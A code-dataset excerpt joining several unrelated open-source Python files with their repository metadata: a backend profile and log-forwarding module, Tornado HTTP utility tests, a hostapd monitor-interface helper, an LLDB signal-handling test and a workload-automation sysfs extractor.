should_update = request.uid == address_uid
else:
old_address = profile_info.get_address(address_uid)
should_update = True if old_address else False
if should_update:
return _save_existing_address(profile_info, old_address, request)
if is_update:
profile_info.addresses.remove(old_address)
existing_address = profile_info.get_address(address_uid)
if existing_address:
return _save_existing_address(profile_info, existing_address, request)
street_uid = UserProfileInfoAddress.create_uid([country_code,
request.zip_code,
request.street_name])
address = UserProfileInfoAddress(created=datetime.now(),
address_uid=address_uid,
street_uid=street_uid,
label=request.label,
geo_location=ndb.GeoPt(request.geo_location.lat,
request.geo_location.lon),
distance=request.distance,
street_name=request.street_name,
house_nr=request.house_nr,
bus_nr=request.bus_nr,
zip_code=request.zip_code,
city=request.city,
type=request.type,
country_code=country_code)
profile_info.addresses.append(address)
profile_info.put()
after_profile_info_updated(profile_info)
return address
def _save_existing_address(profile_info, existing_address, request):
existing_address.label = request.label
existing_address.distance = request.distance
existing_address.type = request.type
profile_info.put()
after_profile_info_updated(profile_info)
return existing_address
@returns(UserProfileInfoAddress)
@arguments(app_user=users.User, request=AddProfileAddressRequestTO)
def add_profile_address(app_user, request):
return _update_profile_address(app_user, request)
@returns(UserProfileInfoAddress)
@arguments(app_user=users.User, request=UpdateProfileAddressRequestTO)
def update_profile_address(app_user, request):
return _update_profile_address(app_user, request, is_update=True)
@returns()
@arguments(app_user=users.User, address_uids=[unicode])
def delete_profile_addresses(app_user, address_uids):
upi = UserProfileInfo.create_key(app_user).get()
if not upi:
return
should_put = False
for a in reversed(upi.addresses):
if a.address_uid in address_uids:
should_put = True
upi.addresses.remove(a)
if should_put:
upi.put()
after_profile_info_updated(upi)
def after_profile_info_updated(profile):
# type: (UserProfileInfo) -> None
deferred.defer(_after_profile_info_updated, profile)
def _after_profile_info_updated(profile):
# type: (UserProfileInfo) -> None
from rogerthat.bizz.service import set_user_data_object
app_user = profile.app_user
user_profile = get_user_profile(app_user)
community = get_community(user_profile.community_id)
if CustomizationFeatures.HOME_ADDRESS_IN_USER_DATA in community.customization_features and community.main_service:
si_user = create_service_identity_user(community.main_service_user)
home_addresses = [p for p in profile.addresses if p.type == UserAddressType.HOME]
user_data = {'home_address': {'city': home_addresses[0].city} if home_addresses else None}
set_user_data_object(si_user, app_user, user_data)
@returns([ProfilePhoneNumberTO])
@arguments(app_user=users.User)
def get_profile_phone_numbers(app_user):
return get_profile_phone_numbers_to(UserProfileInfo.create_key(app_user).get())
@returns([ProfilePhoneNumberTO])
@arguments(user_profile_info=UserProfileInfo)
def get_profile_phone_numbers_to(user_profile_info):
# type: (UserProfileInfo) -> list[ProfilePhoneNumberTO]
if not user_profile_info or not user_profile_info.phone_numbers:
return []
return [ProfilePhoneNumberTO.from_model(m) for m in user_profile_info.phone_numbers]
def _update_profile_phone_number(app_user, request, is_update=False):
# type: (users.User, ProfilePhoneNumberTO, bool) -> UserProfileInfoAddress
upi_key = UserProfileInfo.create_key(app_user)
profile_info = upi_key.get()
if not profile_info:
if is_update:
return None
profile_info = UserProfileInfo(key=upi_key)
phone_number = UserProfileInfoPhoneNumber(created=datetime.now(),
type=request.type,
label=request.label,
number=request.number)
phone_number_uid = phone_number.uid
if is_update:
old_phone_number = profile_info.get_phone_number(request.uid)
if not old_phone_number:
return None
if request.uid == phone_number_uid:
return _save_existing_phone_number(profile_info, old_phone_number, request)
else:
old_phone_number = profile_info.get_phone_number(phone_number_uid)
if old_phone_number:
return _save_existing_phone_number(profile_info, old_phone_number, request)
if is_update:
profile_info.phone_numbers.remove(old_phone_number)
existing_phone_number = profile_info.get_phone_number(phone_number_uid)
if existing_phone_number:
return _save_existing_phone_number(profile_info, existing_phone_number, request)
profile_info.phone_numbers.append(phone_number)
profile_info.put()
return phone_number
def _save_existing_phone_number(profile_info, existing_phone_number, request):
existing_phone_number.type = request.type
existing_phone_number.label = request.label
profile_info.put()
return existing_phone_number
@returns(UserProfileInfoPhoneNumber)
@arguments(app_user=users.User, request=AddProfilePhoneNumberRequestTO)
def add_profile_phone_number(app_user, request):
return _update_profile_phone_number(app_user, request)
@returns(UserProfileInfoPhoneNumber)
@arguments(app_user=users.User, request=UpdateProfilePhoneNumberRequestTO)
def update_profile_phone_number(app_user, request):
return _update_profile_phone_number(app_user, request, is_update=True)
@returns()
@arguments(app_user=users.User, uids=[unicode])
def delete_profile_phone_numbers(app_user, uids):
upi = UserProfileInfo.create_key(app_user).get()
if not upi:
return
should_put = False
for m in reversed(upi.phone_numbers):
if m.uid in uids:
should_put = True
upi.phone_numbers.remove(m)
if should_put:
upi.put()
@returns(CurrentlyForwardingLogs)
@arguments(app_user=users.User, xmpp_target_jid=unicode, mobile=Mobile, xmpp_target_password=unicode, type_=int)
def start_log_forwarding(app_user, xmpp_target_jid, mobile=None, xmpp_target_password=None,
type_=CurrentlyForwardingLogs.TYPE_XMPP):
def trans():
request = ForwardLogsRequestTO()
request.jid = unicode(xmpp_target_jid) if xmpp_target_jid else None
forwardLogs(forward_logs_response_handler, logError, app_user, request=request, MOBILE_ACCOUNT=mobile)
if request.jid:
clf = CurrentlyForwardingLogs(key=CurrentlyForwardingLogs.create_key(app_user),
xmpp_target=request.jid,
xmpp_target_password=xmpp_target_password,
type=type_)
clf.put()
return clf
else:
db.delete(CurrentlyForwardingLogs.create_key(app_user))
return None
if db.is_in_transaction:
return trans()
else:
xg_on = db.create_transaction_options(xg=True)
return db.run_in_transaction_options(xg_on, trans)
@returns(NoneType)
@arguments(app_user=users.User)
def stop_log_forwarding(app_user):
start_log_forwarding(app_user, None)
@returns([CurrentlyForwardingLogs])
@arguments()
def get_users_currently_forwarding_logs():
def trans():
return generator(CurrentlyForwardingLogs.all().ancestor(CurrentlyForwardingLogs.create_parent_key()))
return db.run_in_transaction(trans)
@returns()
@arguments(service_user=users.User, email=unicode, success=bool)
def delete_service_finished(service_user, email, success):
from rogerthat.service.api.system import service_deleted
service_deleted(system_service_deleted_response_handler, logServiceError, get_service_profile(service_user),
email=email, success=success)
@mapping('system.service_deleted.response_handler')
@returns(NoneType)
@arguments(context=ServiceAPICallback, result=NoneType)
def system_service_deleted_response_handler(context, result):
pass
@mapping('com.mobicage.capi.system.update_app_asset')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=UpdateAppAssetResponseTO)
def update_app_asset_response(context, result):
pass
@mapping('com.mobicage.capi.system.update_embedded_app')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=UpdateEmbeddedAppResponseTO)
def update_embedded_app_response(context, result):
pass
@mapping('com.mobicage.capi.system.update_embedded_apps')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=UpdateEmbeddedAppsResponseTO)
def update_embedded_apps_response(context, result):
pass
|
our-city-app/oca-backend
|
src/rogerthat/bizz/system.py
|
Python
|
apache-2.0
| 40,307
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
from tornado.httputil import url_concat, parse_multipart_form_data, HTTPHeaders, format_timestamp, HTTPServerRequest
from tornado.escape import utf8
from tornado.log import gen_log
from tornado.testing import ExpectLog
from tornado.test.util import unittest
import datetime
import logging
import time
class TestUrlConcat(unittest.TestCase):
def test_url_concat_no_query_params(self):
url = url_concat(
"https://localhost/path",
[('y', 'y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?y=y&z=z")
def test_url_concat_encode_args(self):
url = url_concat(
"https://localhost/path",
[('y', '/y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?y=%2Fy&z=z")
def test_url_concat_trailing_q(self):
url = url_concat(
"https://localhost/path?",
[('y', 'y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?y=y&z=z")
def test_url_concat_q_with_no_trailing_amp(self):
url = url_concat(
"https://localhost/path?x",
[('y', 'y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?x&y=y&z=z")
def test_url_concat_trailing_amp(self):
url = url_concat(
"https://localhost/path?x&",
[('y', 'y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?x&y=y&z=z")
def test_url_concat_mult_params(self):
url = url_concat(
"https://localhost/path?a=1&b=2",
[('y', 'y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?a=1&b=2&y=y&z=z")
def test_url_concat_no_params(self):
url = url_concat(
"https://localhost/path?r=1&t=2",
[],
)
self.assertEqual(url, "https://localhost/path?r=1&t=2")
class MultipartFormDataTest(unittest.TestCase):
def test_file_upload(self):
data = b"""\
--1234
Content-Disposition: form-data; name="files"; filename="ab.txt"
Foo
--1234--""".replace(b"\n", b"\r\n")
args = {}
files = {}
parse_multipart_form_data(b"1234", data, args, files)
file = files["files"][0]
self.assertEqual(file["filename"], "ab.txt")
self.assertEqual(file["body"], b"Foo")
def test_unquoted_names(self):
# quotes are optional unless special characters are present
data = b"""\
--1234
Content-Disposition: form-data; name=files; filename=ab.txt
Foo
--1234--""".replace(b"\n", b"\r\n")
args = {}
files = {}
parse_multipart_form_data(b"1234", data, args, files)
file = files["files"][0]
self.assertEqual(file["filename"], "ab.txt")
self.assertEqual(file["body"], b"Foo")
def test_special_filenames(self):
filenames = ['a;b.txt',
'a"b.txt',
'a";b.txt',
'a;"b.txt',
'a";";.txt',
'a\\"b.txt',
'a\\b.txt',
]
for filename in filenames:
logging.debug("trying filename %r", filename)
data = """\
--1234
Content-Disposition: form-data; name="files"; filename="%s"
Foo
--1234--""" % filename.replace('\\', '\\\\').replace('"', '\\"')
data = utf8(data.replace("\n", "\r\n"))
args = {}
files = {}
parse_multipart_form_data(b"1234", data, args, files)
file = files["files"][0]
self.assertEqual(file["filename"], filename)
self.assertEqual(file["body"], b"Foo")
def test_boundary_starts_and_ends_with_quotes(self):
data = b'''\
--1234
Content-Disposition: form-data; name="files"; filename="ab.txt"
Foo
--1234--'''.replace(b"\n", b"\r\n")
args = {}
files = {}
parse_multipart_form_data(b'"1234"', data, args, files)
file = files["files"][0]
self.assertEqual(file["filename"], "ab.txt")
self.assertEqual(file["body"], b"Foo")
def test_missing_headers(self):
data = b'''\
--1234
Foo
--1234--'''.replace(b"\n", b"\r\n")
args = {}
files = {}
with ExpectLog(gen_log, "multipart/form-data missing headers"):
parse_multipart_form_data(b"1234", data, args, files)
self.assertEqual(files, {})
def test_invalid_content_disposition(self):
data = b'''\
--1234
Content-Disposition: invalid; name="files"; filename="ab.txt"
Foo
--1234--'''.replace(b"\n", b"\r\n")
args = {}
files = {}
with ExpectLog(gen_log, "Invalid multipart/form-data"):
parse_multipart_form_data(b"1234", data, args, files)
self.assertEqual(files, {})
def test_line_does_not_end_with_correct_line_break(self):
data = b'''\
--1234
Content-Disposition: form-data; name="files"; filename="ab.txt"
Foo--1234--'''.replace(b"\n", b"\r\n")
args = {}
files = {}
with ExpectLog(gen_log, "Invalid multipart/form-data"):
parse_multipart_form_data(b"1234", data, args, files)
self.assertEqual(files, {})
def test_content_disposition_header_without_name_parameter(self):
data = b"""\
--1234
Content-Disposition: form-data; filename="ab.txt"
Foo
--1234--""".replace(b"\n", b"\r\n")
args = {}
files = {}
with ExpectLog(gen_log, "multipart/form-data value missing name"):
parse_multipart_form_data(b"1234", data, args, files)
self.assertEqual(files, {})
def test_data_after_final_boundary(self):
# The spec requires that data after the final boundary be ignored.
# http://www.w3.org/Protocols/rfc1341/7_2_Multipart.html
# In practice, some libraries include an extra CRLF after the boundary.
data = b"""\
--1234
Content-Disposition: form-data; name="files"; filename="ab.txt"
Foo
--1234--
""".replace(b"\n", b"\r\n")
args = {}
files = {}
parse_multipart_form_data(b"1234", data, args, files)
file = files["files"][0]
self.assertEqual(file["filename"], "ab.txt")
self.assertEqual(file["body"], b"Foo")
class HTTPHeadersTest(unittest.TestCase):
def test_multi_line(self):
# Lines beginning with whitespace are appended to the previous line
# with any leading whitespace replaced by a single space.
# Note that while multi-line headers are a part of the HTTP spec,
# their use is strongly discouraged.
data = """\
Foo: bar
baz
Asdf: qwer
\tzxcv
Foo: even
more
lines
""".replace("\n", "\r\n")
headers = HTTPHeaders.parse(data)
self.assertEqual(headers["asdf"], "qwer zxcv")
self.assertEqual(headers.get_list("asdf"), ["qwer zxcv"])
self.assertEqual(headers["Foo"], "bar baz,even more lines")
self.assertEqual(headers.get_list("foo"), ["bar baz", "even more lines"])
self.assertEqual(sorted(list(headers.get_all())),
[("Asdf", "qwer zxcv"),
("Foo", "bar baz"),
("Foo", "even more lines")])
class FormatTimestampTest(unittest.TestCase):
# Make sure that all the input types are supported.
TIMESTAMP = 1359312200.503611
EXPECTED = 'Sun, 27 Jan 2013 18:43:20 GMT'
def check(self, value):
self.assertEqual(format_timestamp(value), self.EXPECTED)
def test_unix_time_float(self):
self.check(self.TIMESTAMP)
def test_unix_time_int(self):
self.check(int(self.TIMESTAMP))
def test_struct_time(self):
self.check(time.gmtime(self.TIMESTAMP))
def test_time_tuple(self):
tup = tuple(time.gmtime(self.TIMESTAMP))
self.assertEqual(9, len(tup))
self.check(tup)
def test_datetime(self):
self.check(datetime.datetime.utcfromtimestamp(self.TIMESTAMP))
# HTTPServerRequest is mainly tested incidentally to the server itself,
# but this tests the parts of the class that can be tested in isolation.
class HTTPServerRequestTest(unittest.TestCase):
def test_default_constructor(self):
# All parameters are formally optional, but uri is required
# (and has been for some time). This test ensures that no
# more required parameters slip in.
HTTPServerRequest(uri='/')
|
leekchan/tornado_test
|
tornado/test/httputil_test.py
|
Python
|
apache-2.0
| 8,511
|
# coding: utf-8
# pylint: disable=wildcard-import
"""
Provides logic for non API urls
"""
#from .error import *
#from .index import *
#from .user import *
|
chdb/DhammaMap1
|
main/control/__init__.py
|
Python
|
mit
| 157
|
# Monitor support
# Copyright (c) 2016, Tieto Corporation
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import time
from remotehost import Host
import config
import rutils
import re
import traceback
import logging
logger = logging.getLogger()
import hostapd
# standalone monitor with multi iface support
def create(devices, setup_params, refs, duts, monitors):
mons = []
mhosts = []
hosts = duts + refs
# choose only standalone monitors
for monitor in monitors:
if monitor not in hosts and monitor != "all":
mons.append(monitor)
for mon in mons:
dev = config.get_device(devices, mon)
if dev is None:
continue
host = Host(host=dev['hostname'],
ifname=dev['ifname'],
port=dev['port'],
name=dev['name'])
try:
host.execute(["iw", "reg", "set", setup_params['country']])
rutils.setup_hw_host(host, setup_params, True)
except:
pass
mhosts.append(host)
return mhosts
def destroy(devices, hosts):
for host in hosts:
stop(host)
for monitor in host.monitors:
host.execute(["ifconfig", monitor, "down"])
def setup(host, monitor_params):
if host is None:
return
ifaces = re.split('; | |, ', host.ifname)
count = 0
for param in monitor_params:
try:
iface = ifaces[count]
except:
logger.debug(traceback.format_exc())
break
host.execute(["ifconfig", iface, " down"])
host.execute(["iw", iface, "set type monitor"])
host.execute(["ifconfig", iface, "up"])
status, buf = host.execute(["iw", iface, "set", "freq", param['freq'],
param['bw'], param['center_freq1'],
param['center_freq2']])
if status != 0:
logger.debug("Could not setup monitor interface: " + buf)
continue
host.monitors.append(iface)
count = count + 1
def run(host, setup_params):
monitor_res = []
log_monitor = ""
if host is None:
return None
if len(host.monitors) == 0:
return None
try:
log_dir = setup_params['log_dir']
tc_name = setup_params['tc_name']
except:
return None
tshark = "tshark"
for monitor in host.monitors:
host.execute(["ifconfig", monitor, "up"])
tshark = tshark + " -i " + monitor
log_monitor = log_monitor + "_" + monitor
log = log_dir + tc_name + "_" + host.name + log_monitor + ".pcap"
host.add_log(log)
thread = host.execute_run([tshark, "-w", log], monitor_res)
host.thread = thread
def stop(host):
if host is None:
return
if len(host.monitors) == 0:
return
if host.thread is None:
return
host.execute(["killall", "-s", "INT", "tshark"])
host.wait_execute_complete(host.thread, 5)
if host.thread.isAlive():
raise Exception("tshark still alive")
host.thread = None
# Add monitor to existing interface
def add(host, monitors):
if host is None:
return
for monitor in monitors:
if monitor != "all" and monitor != host.name:
continue
mon = "mon_" + host.ifname
status, buf = host.execute(["iw", host.ifname, "interface", "add", mon,
"type", "monitor"])
if status == 0:
host.monitors.append(mon)
host.execute(["ifconfig", mon, "up"])
else:
logger.debug("Could not add monitor for " + host.name)
def remove(host):
stop(host)
for monitor in host.monitors:
host.execute(["iw", monitor, "del"])
host.monitors.remove(monitor)
# get monitor params from hostapd/wpa_supplicant
def get_monitor_params(wpa, is_p2p=False):
if is_p2p:
get_status_field_f = wpa.get_group_status_field
else:
get_status_field_f = wpa.get_status_field
freq = get_status_field_f("freq")
bw = "20"
center_freq1 = ""
center_freq2 = ""
vht_oper_chwidth = get_status_field_f("vht_oper_chwidth")
secondary_channel = get_status_field_f("secondary_channel")
vht_oper_centr_freq_seg0_idx = get_status_field_f("vht_oper_centr_freq_seg0_idx")
vht_oper_centr_freq_seg1_idx = get_status_field_f("vht_oper_centr_freq_seg1_idx")
if vht_oper_chwidth == "0" or vht_oper_chwidth is None:
if secondary_channel == "1":
bw = "40"
center_freq1 = str(int(freq) + 10)
elif secondary_channel == "-1":
center_freq1 = str(int(freq) - 10)
else:
pass
elif vht_oper_chwidth == "1":
bw = "80"
center_freq1 = str(int(vht_oper_centr_freq_seg0_idx) * 5 + 5000)
elif vht_oper_chwidth == "2":
bw = "160"
center_freq1 = str(int(vht_oper_centr_freq_seg0_idx) * 5 + 5000)
elif vht_oper_chwidth == "3":
bw = "80+80"
center_freq1 = str(int(vht_oper_centr_freq_seg0_idx) * 5 + 5000)
center_freq2 = str(int(vht_oper_centr_freq_seg1_idx) * 5 + 5000)
else:
pass
monitor_params = {"freq" : freq,
"bw" : bw,
"center_freq1" : center_freq1,
"center_freq2" : center_freq2}
return monitor_params
|
s0lst1c3/eaphammer
|
local/hostapd-eaphammer/tests/remote/monitor.py
|
Python
|
gpl-3.0
| 5,448
|
"""Test that we handle inferiors that send signals to themselves"""
from __future__ import print_function
import lldb
import re
from lldbsuite.test.lldbplatformutil import getDarwinOSTriples
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
@skipIfWindows # signals do not exist on Windows
class RaiseTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
NO_DEBUG_INFO_TESTCASE = True
@skipIfNetBSD # Hangs on NetBSD
def test_sigstop(self):
self.build()
self.signal_test('SIGSTOP', False)
# passing of SIGSTOP is not correctly handled, so not testing that
# scenario: https://llvm.org/bugs/show_bug.cgi?id=23574
@skipIfDarwin # darwin does not support real time signals
@skipIfTargetAndroid()
def test_sigsigrtmin(self):
self.build()
self.signal_test('SIGRTMIN', True)
@skipIfNetBSD # Hangs on NetBSD
def test_sigtrap(self):
self.build()
self.signal_test('SIGTRAP', True)
def launch(self, target, signal):
# launch the process, do not stop at entry point.
process = target.LaunchSimple(
[signal], None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
self.assertEqual(process.GetState(), lldb.eStateStopped)
thread = lldbutil.get_stopped_thread(
process, lldb.eStopReasonBreakpoint)
self.assertTrue(
thread.IsValid(),
"Thread should be stopped due to a breakpoint")
return process
def set_handle(self, signal, pass_signal, stop_at_signal, notify_signal):
return_obj = lldb.SBCommandReturnObject()
self.dbg.GetCommandInterpreter().HandleCommand(
"process handle %s -p %s -s %s -n %s" %
(signal, pass_signal, stop_at_signal, notify_signal), return_obj)
self.assertTrue(
return_obj.Succeeded(),
"Setting signal handling failed")
def signal_test(self, signal, test_passing):
"""Test that we handle inferior raising signals"""
exe = self.getBuildArtifact("a.out")
# Create a target by the debugger.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
lldbutil.run_break_set_by_symbol(self, "main")
# launch
process = self.launch(target, signal)
signo = process.GetUnixSignals().GetSignalNumberFromName(signal)
# retrieve default signal disposition
return_obj = lldb.SBCommandReturnObject()
self.dbg.GetCommandInterpreter().HandleCommand(
"process handle %s " % signal, return_obj)
match = re.match(
'NAME *PASS *STOP *NOTIFY.*(false|true) *(false|true) *(false|true)',
return_obj.GetOutput(),
re.IGNORECASE | re.DOTALL)
if not match:
self.fail('Unable to retrieve default signal disposition.')
default_pass = match.group(1)
default_stop = match.group(2)
default_notify = match.group(3)
# Make sure we stop at the signal
self.set_handle(signal, "false", "true", "true")
process.Continue()
self.assertEqual(process.GetState(), lldb.eStateStopped)
thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonSignal)
self.assertTrue(
thread.IsValid(),
"Thread should be stopped due to a signal")
self.assertTrue(
thread.GetStopReasonDataCount() >= 1,
"There was data in the event.")
self.assertEqual(thread.GetStopReasonDataAtIndex(0), signo,
"The stop signal was %s" % signal)
# Continue until we exit.
process.Continue()
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), 0)
# launch again
process = self.launch(target, signal)
# Make sure we do not stop at the signal. We should still get the
# notification.
self.set_handle(signal, "false", "false", "true")
self.expect(
"process continue",
substrs=[
"stopped and restarted",
signal])
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), 0)
# launch again
process = self.launch(target, signal)
# Make sure we do not stop at the signal, and we do not get the
# notification.
self.set_handle(signal, "false", "false", "false")
self.expect(
"process continue",
substrs=["stopped and restarted"],
matching=False)
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), 0)
if not test_passing:
# reset signal handling to default
self.set_handle(signal, default_pass, default_stop, default_notify)
return
# launch again
process = self.launch(target, signal)
# Make sure we stop at the signal
self.set_handle(signal, "true", "true", "true")
process.Continue()
self.assertEqual(process.GetState(), lldb.eStateStopped)
thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonSignal)
self.assertTrue(
thread.IsValid(),
"Thread should be stopped due to a signal")
self.assertTrue(
thread.GetStopReasonDataCount() >= 1,
"There was data in the event.")
self.assertEqual(
thread.GetStopReasonDataAtIndex(0),
process.GetUnixSignals().GetSignalNumberFromName(signal),
"The stop signal was %s" %
signal)
# Continue until we exit. The process should receive the signal.
process.Continue()
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), signo)
# launch again
process = self.launch(target, signal)
# Make sure we do not stop at the signal. We should still get the notification. Process
# should receive the signal.
self.set_handle(signal, "true", "false", "true")
self.expect(
"process continue",
substrs=[
"stopped and restarted",
signal])
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), signo)
# launch again
process = self.launch(target, signal)
# Make sure we do not stop at the signal, and we do not get the notification. Process
# should receive the signal.
self.set_handle(signal, "true", "false", "false")
self.expect(
"process continue",
substrs=["stopped and restarted"],
matching=False)
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), signo)
# reset signal handling to default
self.set_handle(signal, default_pass, default_stop, default_notify)
|
apple/swift-lldb
|
packages/Python/lldbsuite/test/functionalities/signal/raise/TestRaise.py
|
Python
|
apache-2.0
| 7,195
|
# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=W0613,no-member,attribute-defined-outside-init
"""
Some "standard" instruments to collect additional info about workload execution.
.. note:: The run() method of a Workload may perform some "boilerplate" as well as
the actual execution of the workload (e.g. it may contain UI automation
needed to start the workload). This "boilerplate" execution will also
be measured by these instruments. As such, they are not suitable for collected
precise data about specific operations.
"""
import os
import re
import logging
import time
import tarfile
from itertools import izip, izip_longest
from subprocess import CalledProcessError
from wlauto import Instrument, Parameter
from wlauto.core import signal
from wlauto.exceptions import DeviceError, ConfigError
from wlauto.utils.misc import diff_tokens, write_table, check_output, as_relative
from wlauto.utils.misc import ensure_file_directory_exists as _f
from wlauto.utils.misc import ensure_directory_exists as _d
from wlauto.utils.android import ApkInfo
from wlauto.utils.types import list_of_strings
logger = logging.getLogger(__name__)
class SysfsExtractor(Instrument):
name = 'sysfs_extractor'
description = """
Collects the contest of a set of directories, before and after workload execution
and diffs the result.
"""
mount_command = 'mount -t tmpfs -o size={} tmpfs {}'
extract_timeout = 30
tarname = 'sysfs.tar'
DEVICE_PATH = 0
BEFORE_PATH = 1
AFTER_PATH = 2
DIFF_PATH = 3
parameters = [
Parameter('paths', kind=list_of_strings, mandatory=True,
description="""A list of paths to be pulled from the device. These could be directories
as well as files.""",
global_alias='sysfs_extract_dirs'),
Parameter('use_tmpfs', kind=bool, default=None,
description="""
Specifies whether tmpfs should be used to cache sysfile trees and then pull them down
as a tarball. This is significantly faster then just copying the directory trees from
the device directly, bur requres root and may not work on all devices. Defaults to
``True`` if the device is rooted and ``False`` if it is not.
"""),
Parameter('tmpfs_mount_point', default=None,
description="""Mount point for tmpfs partition used to store snapshots of paths."""),
Parameter('tmpfs_size', default='32m',
description="""Size of the tempfs partition."""),
]
def initialize(self, context):
if not self.device.is_rooted and self.use_tmpfs: # pylint: disable=access-member-before-definition
raise ConfigError('use_tempfs must be False for an unrooted device.')
elif self.use_tmpfs is None: # pylint: disable=access-member-before-definition
self.use_tmpfs = self.device.is_rooted
if self.use_tmpfs:
self.on_device_before = self.device.path.join(self.tmpfs_mount_point, 'before')
self.on_device_after = self.device.path.join(self.tmpfs_mount_point, 'after')
if not self.device.file_exists(self.tmpfs_mount_point):
self.device.execute('mkdir -p {}'.format(self.tmpfs_mount_point), as_root=True)
self.device.execute(self.mount_command.format(self.tmpfs_size, self.tmpfs_mount_point),
as_root=True)
def setup(self, context):
before_dirs = [
_d(os.path.join(context.output_directory, 'before', self._local_dir(d)))
for d in self.paths
]
after_dirs = [
_d(os.path.join(context.output_directory, 'after', self._local_dir(d)))
for d in self.paths
]
diff_dirs = [
_d(os.path.join(context.output_directory, 'diff', self._local_dir(d)))
for d in self.paths
]
self.device_and_host_paths = zip(self.paths, before_dirs, after_dirs, diff_dirs)
if self.use_tmpfs:
for d in self.paths:
before_dir = self.device.path.join(self.on_device_before,
self.device.path.dirname(as_relative(d)))
after_dir = self.device.path.join(self.on_device_after,
self.device.path.dirname(as_relative(d)))
if self.device.file_exists(before_dir):
self.device.execute('rm -rf {}'.format(before_dir), as_root=True)
self.device.execute('mkdir -p {}'.format(before_dir), as_root=True)
if self.device.file_exists(after_dir):
self.device.execute('rm -rf {}'.format(after_dir), as_root=True)
self.device.execute('mkdir -p {}'.format(after_dir), as_root=True)
def slow_start(self, context):
if self.use_tmpfs:
for d in self.paths:
dest_dir = self.device.path.join(self.on_device_before, as_relative(d))
if '*' in dest_dir:
dest_dir = self.device.path.dirname(dest_dir)
self.device.execute('{} cp -Hr {} {}'.format(self.device.busybox, d, dest_dir),
as_root=True, check_exit_code=False)
else: # not rooted
for dev_dir, before_dir, _, _ in self.device_and_host_paths:
self.device.pull_file(dev_dir, before_dir)
def slow_stop(self, context):
if self.use_tmpfs:
for d in self.paths:
dest_dir = self.device.path.join(self.on_device_after, as_relative(d))
if '*' in dest_dir:
dest_dir = self.device.path.dirname(dest_dir)
self.device.execute('{} cp -Hr {} {}'.format(self.device.busybox, d, dest_dir),
as_root=True, check_exit_code=False)
else: # not using tmpfs
for dev_dir, _, after_dir, _ in self.device_and_host_paths:
self.device.pull_file(dev_dir, after_dir)
def update_result(self, context):
if self.use_tmpfs:
on_device_tarball = self.device.path.join(self.device.working_directory, self.tarname)
on_host_tarball = self.device.path.join(context.output_directory, self.tarname + ".gz")
self.device.execute('{} tar cf {} -C {} .'.format(self.device.busybox,
on_device_tarball,
self.tmpfs_mount_point),
as_root=True)
self.device.execute('chmod 0777 {}'.format(on_device_tarball), as_root=True)
self.device.execute('{} gzip {}'.format(self.device.busybox,
on_device_tarball))
self.device.pull_file(on_device_tarball + ".gz", on_host_tarball)
with tarfile.open(on_host_tarball, 'r:gz') as tf:
tf.extractall(context.output_directory)
self.device.delete_file(on_device_tarball + ".gz")
os.remove(on_host_tarball)
for paths in self.device_and_host_paths:
after_dir = paths[self.AFTER_PATH]
dev_dir = paths[self.DEVICE_PATH].strip('*') # remove potential trailing '*'
if (not os.listdir(after_dir) and
self.device.file_exists(dev_dir) and
self.device.listdir(dev_dir)):
self.logger.error('sysfs files were not pulled from the device.')
self.device_and_host_paths.remove(paths) # Path is removed to skip diffing it
for _, before_dir, after_dir, diff_dir in self.device_and_host_paths:
_diff_sysfs_dirs(before_dir, after_dir, diff_dir)
def teardown(self, context):
self._one_time_setup_done = []
def finalize(self, context):
if self.use_tmpfs:
try:
self.device.execute('umount {}'.format(self.tmpfs_mount_point), as_root=True)
except (DeviceError, CalledProcessError):
# assume a directory but not mount point
pass
self.device.execute('rm -rf {}'.format(self.tmpfs_mount_point),
as_root=True, check_exit_code=False)
def validate(self):
if not self.tmpfs_mount_point: # pylint: disable=access-member-before-definition
self.tmpfs_mount_point = self.device.path.join(self.device.working_directory, 'temp-fs')
def _local_dir(self, directory):
return os.path.dirname(as_relative(directory).replace(self.device.path.sep, os.sep))
class ExecutionTimeInstrument(Instrument):
name = 'execution_time'
description = """
Measure how long it took to execute the run() methods of a Workload.
"""
priority = 15
def __init__(self, device, **kwargs):
super(ExecutionTimeInstrument, self).__init__(device, **kwargs)
self.start_time = None
self.end_time = None
def on_run_start(self, context):
signal.connect(self.get_start_time, signal.BEFORE_WORKLOAD_EXECUTION, priority=self.priority)
signal.connect(self.get_stop_time, signal.AFTER_WORKLOAD_EXECUTION, priority=self.priority)
def get_start_time(self, context):
self.start_time = time.time()
def get_stop_time(self, context):
self.end_time = time.time()
def update_result(self, context):
execution_time = self.end_time - self.start_time
context.result.add_metric('execution_time', execution_time, 'seconds')
class ApkVersion(Instrument):
name = 'apk_version'
description = """
(DEPRECATED) Extracts APK versions for workloads that have them.
